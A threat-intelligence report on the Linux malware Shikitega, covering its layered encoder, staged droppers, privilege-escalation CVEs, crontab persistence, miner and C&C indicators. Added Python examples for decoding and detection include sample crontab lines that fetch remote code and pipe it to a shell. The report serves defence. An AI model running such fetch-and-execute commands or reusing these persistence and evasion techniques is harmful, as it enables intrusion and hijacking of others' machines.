Executive summary
AT&T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.
Key takeaways:
- The malware downloads and executes Metasploit’s “Mettle” meterpreter to maximize its control on infected machines.
- Shikitega exploits system vulnerabilities to gain high privileges, persist and execute a crypto miner.
- The malware uses a polymorphic encoder to make it more difficult for anti-virus engines to detect.
- Shikitega abuses legitimate cloud services to host some of its command and control servers (C&C).
Figure 1. Shikitega operation process.
Background
With a rise of almost 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malware such as BotenaGo and EnemyBot are examples of how malware authors rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.
Shikitega uses an infection chain in multiple layers, where the first one contains only a few hundred bytes, and each module is responsible for a specific task, from downloading and executing Metasploit meterpreter, exploiting Linux vulnerabilities and setting persistence in the infected machine to downloading and executing a cryptominer.
Analysis
The main dropper of the malware is a very small ELF file, whose total size is only around 370 bytes, while its actual code size is around 300 bytes. (Figure 2)
Figure 2. Malicious ELF file with a total of only 376 bytes.
The malware uses the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, which is one of the most popular encoders used in Metasploit. Using the encoder, the malware runs through several decode loops, where one loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stub is generated based on dynamic instruction substitution and dynamic block ordering. In addition, registers are selected dynamically. Below we can see how the encoder decrypts the first two loops: (figures 3 and 4)
Figure 3. First “Shikata Ga Nai” decryption loop.
Figure 4. Second “Shikata Ga Nai” decryption loop created by the first one.
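To make the layered decoding concrete, the following is an added example (not code from the AT&T Alien Labs report or from Metasploit) of the XOR additive feedback arithmetic that a “Shikata Ga Nai” style decode loop applies to each 32-bit word: the word is XORed with a running key, and the decoded word is then added to the key, so every later word depends on everything decoded before it. It assumes dword granularity, little-endian words and feedback on the decoded word; the polymorphic x86 stub itself (register choice, instruction substitution, block ordering) is not modelled. The payload string and the keys are constructed, and the encode helper exists only to build that sample; `peel_layers` is the analyst-side operation of stripping one layer after another, and `avalanche` shows why a byte-level signature on the encoded body is brittle.

```python
"""XOR additive feedback decode, as applied per dword by a Shikata Ga Nai style loop.

Added example, not the report's or Metasploit's code. Assumptions: 32-bit little-endian
words, and the *decoded* word is fed back into the key (key = key + plain mod 2**32).
"""
import struct
from typing import List

MASK32 = 0xFFFFFFFF


def sgn_decode_layer(encoded: bytes, key: int) -> bytes:
    """Undo one layer: per dword, plain = enc ^ key; then key = (key + plain) mod 2^32."""
    if len(encoded) % 4:
        raise ValueError("encoded layer must be a whole number of dwords")
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", encoded):
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)


def sgn_encode_layer(plain: bytes, key: int) -> bytes:
    """Inverse of sgn_decode_layer; used here only to build the constructed sample."""
    padded = plain + b"\x90" * (-len(plain) % 4)  # pad to a dword boundary (constructed choice)
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", padded):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK32
    return bytes(out)


def peel_layers(blob: bytes, keys: List[int]) -> bytes:
    """Apply several decode loops in order (outer layer first), as a multi-layer dropper does."""
    for k in keys:
        blob = sgn_decode_layer(blob, k)
    return blob


def avalanche(encoded: bytes, key: int, flip_byte: int) -> int:
    """Count dwords that decode differently after one byte of the encoded body is flipped.

    The flipped dword and at least the one after it always change (the key drifts by +-1),
    which is why analysts decode or emulate the stub instead of matching encoded bytes.
    """
    corrupted = bytearray(encoded)
    corrupted[flip_byte] ^= 0x01
    a = sgn_decode_layer(encoded, key)
    b = sgn_decode_layer(bytes(corrupted), key)
    return sum(1 for i in range(0, len(a), 4) if a[i:i + 4] != b[i:i + 4])


# Constructed sample: a fake inner-stage command wrapped in two encoder layers.
SAMPLE_PAYLOAD = b"echo constructed-inner-stage;"  # constructed, not a real stage
SAMPLE_KEYS = [0x2A3B4C5D, 0x11223344]            # constructed keys, outer layer first
SAMPLE_ENCODED = sgn_encode_layer(
    sgn_encode_layer(SAMPLE_PAYLOAD, SAMPLE_KEYS[1]), SAMPLE_KEYS[0]
)

if __name__ == "__main__":
    recovered = peel_layers(SAMPLE_ENCODED, SAMPLE_KEYS)
    print("recovered:", recovered.rstrip(b"\x90"))
    print("dwords changed by a 1-byte flip:", avalanche(SAMPLE_ENCODED, SAMPLE_KEYS[0], 0))
```

Run it with a dumped layer and the key recovered from the stub's `mov` immediate to get the next layer; with several nested layers, pass the keys outermost first.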
After several decryption loops, the final payload shellcode will be decrypted and executed. Since the malware doesn’t use any imports, it uses ‘int 0x80’ to execute the appropriate syscall. As the main dropper code is very small, the malware will download and execute additional commands from its command and control by calling syscall 102 (sys_socketcall). (Figure 5)
Figure 5. Calling system functions using interrupts.
The C&C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.
Figure 6. Additional commands received from C&C.
The received command will download additional files from the server that won’t be stored on the hard drive, but rather will be executed from memory only. (Figure 7)
Figure 7. Executes additional shell code received from C&C.
In other malware versions, it will use the “execve” syscall to execute ‘/bin/sh’ with the command received from the C&C. (figure 8)
Figure 8. Executing shell commands by using syscall_execve.
The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that allows the attacker to use a wide range of attacks, from webcam control, sniffer, multiple reverse shells (tcp/http..), process control and executing shell commands to more.
In addition, the malware will use wget to download and execute the next stage dropper.
Next stage dropper
The next downloaded and executed file is another small ELF file (around 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command that will be executed by calling syscall_execve with ‘/bin/sh’ as a parameter together with the decrypted shell command. (Figure 9)
Figure 9. Second stage dropper decrypts and executes shell commands.
The executed shell command will download and execute additional files. To execute the next and last stage dropper, it will exploit two Linux vulnerabilities to elevate privileges: CVE-2021-4034 and CVE-2021-3493 (figures 10 and 11).
Figure 10. Exploiting Linux vulnerability CVE-2021-3493.
Figure 11. Exploiting CVE-2021-4034 vulnerability.
The malware will leverage the exploit to download and execute the final stage with root privileges: persistence and the cryptominer payload.
Persistence
To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the currently logged in user and the other two for the user root. It will first check if the crontab command exists on the machine, and if not, the malware will install it and start the crontab service.
To make sure only one instance is running, it will use the flock command with a lock file “/var/tmp/vm.lock”.
Figure 12. Adding root crontab to execute the final payload.
Below is the list of scripts downloaded and executed to achieve persistence:
| script name | details |
| --- | --- |
| unix.sh | Check if the “crontab” command exists in the system; if not, install it and start the crontab service. |
| brict.sh | Adds a crontab for the current user to execute the cryptominer. |
| politrict.sh | Adds a root crontab to execute the cryptominer. |
| truct.sh | Adds a crontab for the current user to download the cryptominer and config from the C&C. |
| restrict.sh | Adds a root crontab to download the cryptominer and config from the C&C. |
Since the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence.
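The persistence traits described above (crontab entries for both the logged-in user and root that fetch the miner and its config from the C&C, and a flock guard on /var/tmp/vm.lock) are the kind of artefacts a responder can sweep for. The following is an added example, not code from the report or the malware, of a small crontab audit: it parses `crontab -l` style listings, skips comments and variable assignments, and flags commands that download remote content and pipe it to a shell, fetch from a bare IP address (the report notes the C&C is sometimes contacted by IP without a domain name), or use the named lock file. The two listings are constructed sample input, the heuristics are the author's assumptions about what to look for, and the IP addresses are from the TEST-NET range.

```python
"""Audit crontab listings for the persistence traits described in the Shikitega report.

Added example, not the report's code. The sample crontabs below are constructed; the cron
field layout is real, the entries are not real Shikitega artefacts.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

LOCK_FILE = "/var/tmp/vm.lock"  # lock file named in the report

# Heuristics (assumption: traits a defender would look for, not signatures from the malware).
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\b")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?/")
FLOCK_LOCK = re.compile(r"\bflock\b.*" + re.escape(LOCK_FILE))
# Either an @-alias (@reboot, @hourly, ...) or five schedule fields, then the command.
CRON_FIELDS = re.compile(r"^(@\w+|(\S+\s+){5})(?P<cmd>.+)$")


@dataclass
class Finding:
    user: str
    command: str
    reasons: List[str] = field(default_factory=list)


def parse_crontab(text: str) -> List[str]:
    """Return the command part of each schedule line, skipping blanks, comments and VAR=value."""
    cmds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_FIELDS.match(line)
        if m:
            cmds.append(m.group("cmd").strip())
    return cmds


def audit_crontab(user: str, text: str) -> List[Finding]:
    """Flag commands showing the report's persistence traits; traits on one line stack up."""
    findings = []
    for cmd in parse_crontab(text):
        reasons = []
        if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("downloads remote content and executes it")
        if BARE_IP_URL.search(cmd):
            reasons.append("fetches from a bare IP address (no domain name)")
        if FLOCK_LOCK.search(cmd):
            reasons.append("single-instance guard on " + LOCK_FILE)
        if reasons:
            findings.append(Finding(user, cmd, reasons))
    return findings


def audit_all(crontabs: Dict[str, str]) -> List[Finding]:
    """Audit every user's listing; the report notes entries for both the user and root."""
    out = []
    for user, text in crontabs.items():
        out.extend(audit_crontab(user, text))
    return out


# Constructed sample listings, as `crontab -l` would print them, one per user.
SAMPLE_CRONTABS = {
    "root": (
        "# m h dom mon dow command\n"
        "PATH=/usr/bin:/bin\n"
        "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
        '*/5 * * * * flock -n /var/tmp/vm.lock sh -c "curl -s http://203.0.113.7:8080/m.cfg | sh"\n'
    ),
    "alice": (
        "@reboot /home/alice/bin/sync-notes.sh\n"
        "*/10 * * * * wget -q -O - http://203.0.113.7/xm | sh\n"
    ),
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_CRONTABS):
        print("[%s] %s\n    -> %s" % (f.user, f.command, "; ".join(f.reasons)))
```

On a live host the listings would come from `crontab -l -u <user>` for each account (and the files under /var/spool/cron), and the /var/tmp/vm.lock path is worth checking directly, since the report says the scripts delete the downloaded files but rely on that lock file while running.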
Cryptominer payload
The malware downloads and executes the XMRig miner, a popular miner for the Monero cryptocurrency. It will also set a crontab to download and execute the crypto miner and config from the C&C as mentioned in the persistence part above.
Figure 13. XMRig miner is downloaded and executed on an infected machine.
Command and control
Shikitega uses cloud solutions to host some of its command and control servers (C&C), as shown by OTX in figure 14. Since the malware in some cases contacts the command and control server using the IP directly without a domain name, it is difficult to provide a complete list of indicators for detection, since they are volatile and will be used for legitimate purposes within a short period of time.
Figure 14. Command and control server hosted on a legitimate cloud hosting service.
Recommended actions
- Keep software up to date with security updates.
- Install Antivirus and/or EDR on all endpoints.
- Use a backup system to back up server files.
Conclusion
Threat actors continue to look for new ways to deliver malware in order to stay under the radar and avoid detection. Shikitega malware is delivered in a sophisticated way: it uses a polymorphic encoder, and it delivers its payload gradually, where each step reveals only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!
Associated Indicators (IOCs)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related to but out of the scope of the report.
| TYPE | INDICATOR | DESCRIPTION |
| --- | --- | --- |
| DOMAIN | dash[.]cloudflare.ovh | Command and control |
| DOMAIN | main[.]cloudfronts.net | Command and control |
| SHA256 | b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331 | Malware hash |
| SHA256 | 0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed | Malware hash |
| SHA256 | f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb | Malware hash |
| SHA256 | 8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732 | Malware hash |
| SHA256 | d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374 | Malware hash |
| SHA256 | fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765 | Malware hash |
| SHA256 | e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d | Malware hash |
| SHA256 | cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d | Malware hash |
| SHA256 | d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8 | Malware hash |
| SHA256 | 29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8 | Malware hash |
| SHA256 | 4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7 | Malware hash |
| SHA256 | 130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5 | Malware hash |
| SHA256 | 3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098 | Malware hash |
| SHA256 | 6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275 | Malware hash |
| SHA256 | 7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad | Malware hash |
| SHA256 | 2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab | Malware hash CVE-2021-3493 |
| SHA256 | 4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f | Malware hash CVE-2021-4034 |
| SHA256 | e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4 | Malware hash |
| SHA256 | 64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4 | Malware shell script |
| SHA256 | 623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955 | Malware shell script |
| SHA256 | 59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af | Malware shell script |
| SHA256 | 9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338 | Malware shell script |
| SHA256 | 05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464 | Malware shell script |
| SHA256 | ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d | Malware hash |
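The indicators above are written defanged, and the command and control section notes that domain-based indicators are only part of the picture. As an added example (not code from the report), the following turns the table into something a detection pipeline can match: it refangs the domains, checks DNS query log lines against them including subdomains, and compares SHA-256 digests of files against the hash list. The two domains and the two hashes in the code are taken from the table; the DNS log lines and the file contents are constructed, and the log line format is an assumption.

```python
"""Match the report's defanged indicators against DNS log lines and file hashes.

Added example, not the report's code. Domains and hashes are from the IOC table; the log
lines, their format and the file contents are constructed.
"""
import hashlib
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

DEFANGED_DOMAINS = ["dash[.]cloudflare.ovh", "main[.]cloudfronts.net"]  # from the IOC table
IOC_SHA256 = {  # two of the hashes from the IOC table
    "b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331",
    "0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed",
}


def refang(indicator: str) -> str:
    """Undo common defanging: "[.]", "(.)", "{.}" -> "." and a leading "hxxp" -> "http"."""
    s = indicator.strip().lower()
    s = re.sub(r"[\[({]\.[\])}]", ".", s)
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), s)
    return s


def domain_matches(query: str, iocs: Iterable[str]) -> Optional[str]:
    """Return the indicator that `query` equals or is a subdomain of, else None."""
    q = query.rstrip(".").lower()  # tolerate the trailing dot of an FQDN
    for d in iocs:
        if q == d or q.endswith("." + d):
            return d
    return None


# Assumed (constructed) log shape: "<timestamp> <client-ip> query <qname> <qtype>"
DNS_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qname>\S+)\s+(?P<qtype>\w+)$"
)


def scan_dns_log(lines: Iterable[str], iocs: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client, qname, matched_indicator) for every query that hits an indicator."""
    hits = []
    for line in lines:
        m = DNS_LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        matched = domain_matches(m.group("qname"), iocs)
        if matched:
            hits.append((m.group("client"), m.group("qname"), matched))
    return hits


def sha256_hits(files: Dict[str, bytes], hashes: Set[str] = IOC_SHA256) -> Dict[str, str]:
    """Hash each file's bytes and return {name: digest} for those on the indicator list."""
    out = {}
    for name, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in hashes:
            out[name] = digest
    return out


IOC_DOMAINS = [refang(d) for d in DEFANGED_DOMAINS]

# Constructed sample input.
SAMPLE_DNS_LOG = [
    "2022-09-06T10:00:01Z 10.0.0.15 query updates.example.org A",
    "2022-09-06T10:00:07Z 10.0.0.15 query dash.cloudflare.ovh A",
    "2022-09-06T10:01:12Z 10.0.0.22 query cdn.main.cloudfronts.net. A",
    "2022-09-06T10:02:00Z 10.0.0.22 query cloudflare.ovh A",  # parent zone, not an indicator
]
SAMPLE_FILES = {"/tmp/benign.txt": b"nothing to see here\n"}  # constructed, not a sample

if __name__ == "__main__":
    print("indicator domains:", IOC_DOMAINS)
    for hit in scan_dns_log(SAMPLE_DNS_LOG, IOC_DOMAINS):
        print("DNS hit:", hit)
    print("hash hits:", sha256_hits(SAMPLE_FILES))
```

Matching on subdomains catches a host that contacts a name under the listed zone, while the parent zone (cloudflare.ovh) is deliberately not matched, since only the listed names are indicators; for the IP-only C&C contacts the report describes, this list alone is not enough and netflow or process-level telemetry is needed.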
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
- TA0002: Execution
- T1059: Command and Scripting Interpreter
- T1569: System Services
- T1569.002: Service Execution
- TA0003: Persistence
- T1543: Create or Modify System Process
- TA0005: Defense Evasion
- T1027: Obfuscated Files or Information